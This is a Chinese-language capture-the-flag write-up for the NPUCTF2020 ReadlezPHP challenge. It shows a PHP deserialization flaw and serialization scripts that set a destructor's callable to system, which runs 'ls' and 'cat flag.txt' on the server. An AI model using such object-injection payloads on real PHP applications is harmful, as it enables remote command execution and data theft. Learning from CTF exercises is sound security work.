原题目应该是
[NPUCTF2020]ReadlezPHP - L0VEhzzz - 博客园
php源码
<?php
#error_reporting(0);
show_source('index.php');
class Information
{
public $nameA;
public $nameB;
public function __construct(){
$this->nameA = "Y-m-d h:i:s";
$this->nameB = "date";
}
public function __destruct(){
$nameA = $this->nameA;
$nameB = $this->nameB;
echo $nameB($nameA);
}
}
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["input"]);
?>
这道题还是利用了 $nameB($nameA),如果nameB是一个函数nameA是一条命令那么就可以执行了
序列化源码
<?php
class Information
{
public $nameA ;
public $nameB;
public function __construct(){
$this->nameA = "phpinfo()";
$this->nameB = "system";
}
public function __destruct(){
$nameA = $this->nameA;
$nameB= $this->nameB;
echo $nameB($nameA);
}
}
// 序列化操作
$user = new Information(); #实例化
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>
一开始尝试这个
虽然得到页面的函数,但是找不到flag
这道题发生了改变
所以尝试着读取网页目录
<?php
class Information
{
public $nameA ;
public $nameB;
public function __construct(){
$this->nameA = "ls";
$this->nameB = "system";
}
public function __destruct(){
$nameA = $this->nameA;
$nameB= $this->nameB;
echo $nameB($nameA);
}
}
// 序列化操作
$user = new Information(); #实例化
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>
出来flag的文件,
name要如何读取呢?
这也是让我感觉学到了!的一个点
就是按照相同的套路!
<?php
class Information
{
public $nameA ;
public $nameB;
public function __construct(){
$this->nameA = "cat flag.txt";
$this->nameB = "system";
}
public function __destruct(){
$nameA = $this->nameA;
$nameB= $this->nameB;
echo $nameB($nameA);
}
}
// 序列化操作
$user = new Information(); #实例化
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>
用系统命令读取flag.txt
然后就是
拿到了flag